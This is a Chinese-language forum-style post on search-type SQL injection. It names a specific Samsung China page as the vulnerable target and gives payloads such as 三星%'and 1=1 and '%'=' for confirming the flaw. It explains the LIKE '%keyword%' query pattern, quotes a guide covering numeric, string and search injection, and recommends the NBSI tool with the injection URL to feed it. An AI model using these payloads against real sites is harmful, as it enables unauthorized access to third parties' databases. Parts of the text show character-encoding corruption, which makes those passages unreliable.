今天看到有個(gè)關(guān)于搜索型注入的文章，用到的是一種新技術(shù)，探測(cè)的是三星：http://notebook.samsung.com.cn/index.aspx

注入方式是：

一般網(wǎng)站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC=
構(gòu)造注入語(yǔ)句 三星%’and 1=1 and ’%’=’  
             三星%’and 1=2 and ’%’=’

大家看到了吧 兩個(gè)返回頁(yè)面是不一樣的 說(shuō)明有注入的漏洞 特征字 寫(xiě) 筆記本 就是三星%’and 1=1 and ’%’=’ 返回時(shí)有的


我們知道一般搜索代碼是這么寫(xiě)的：

Select * from 表名 where 字段 like ’%關(guān)鍵字%’

這樣就造成了對(duì)關(guān)鍵字前后的所有匹配(%是用來(lái)全部匹配的)

這里如果關(guān)鍵字沒(méi)有過(guò)濾的話(huà)，就可以這樣來(lái)構(gòu)造：

關(guān)鍵字=’ and [查詢(xún)條件] and ‘%’=’

這樣查詢(xún)就變成

select * from 表名 where 字段 like ’%’ and 1=1 and ’%’=’%’

這樣就很好的構(gòu)成了一個(gè)sql注入點(diǎn)，當(dāng)然用手工也可以，用nbsi也可以~~

注入是不分家的，沒(méi)必要什么型什么型的！~

如果不信，大家請(qǐng)看下面的《sql注入天書(shū)》的原話(huà)

第一節(jié)、ＳＱＬ注入的一般步驟

首先，判斷環(huán)境，尋找注入點(diǎn)，判斷數(shù)據(jù)庫(kù)類(lèi)型，這在入門(mén)篇已經(jīng)講過(guò)了。

其次，根據(jù)注入?yún)��?shù)類(lèi)型，在腦海中重構(gòu)SQL語(yǔ)句的原貌，按參數(shù)類(lèi)型主要分為下面三種：

(A)   ID=49 這類(lèi)注入的參數(shù)是數(shù)字型，SQL語(yǔ)句原貌大致如下：
Select * from 表名 where 字段=49
注入的參數(shù)為ID=49 And [查詢(xún)條件]，即是生成語(yǔ)句：
Select * from 表名 where 字段=49 And [查詢(xún)條件]


(B) Class=連續(xù)劇 這類(lèi)注入的參數(shù)是字符型，SQL語(yǔ)句原貌大致概如下：
Select * from 表名 where 字段=’連續(xù)劇’  
注入的參數(shù)為Class=連續(xù)劇’ and [查詢(xún)條件] and ‘’=’ ，即是生成語(yǔ)句：
Select * from 表名 where 字段=’連續(xù)劇’ and [查詢(xún)條件] and ‘’=’’

(C) 搜索時(shí)沒(méi)過(guò)濾參數(shù)的，如keyword=關(guān)鍵字，SQL語(yǔ)句原貌大致如下：
Select * from 表名 where 字段like ’%關(guān)鍵字%’  
注入的參數(shù)為keyword=’ and [查詢(xún)條件] and ‘%’=’， 即是生成語(yǔ)句：
Select * from 表名 where字段like ’%’ and [查詢(xún)條件] and ‘%’=’%’


當(dāng)然手工是麻煩的

用工具的話(huà)，我建議用nbsi的工具比較好，就我感覺(jué)只有nbsi結(jié)合了這個(gè)技術(shù)，用別的軟體是不能注入的

注入點(diǎn)只要寫(xiě)：

http://notebook.samsung.com.cn/news/news.aspx?& ... &ST=title&SC=%

再加個(gè)特征字符就可以了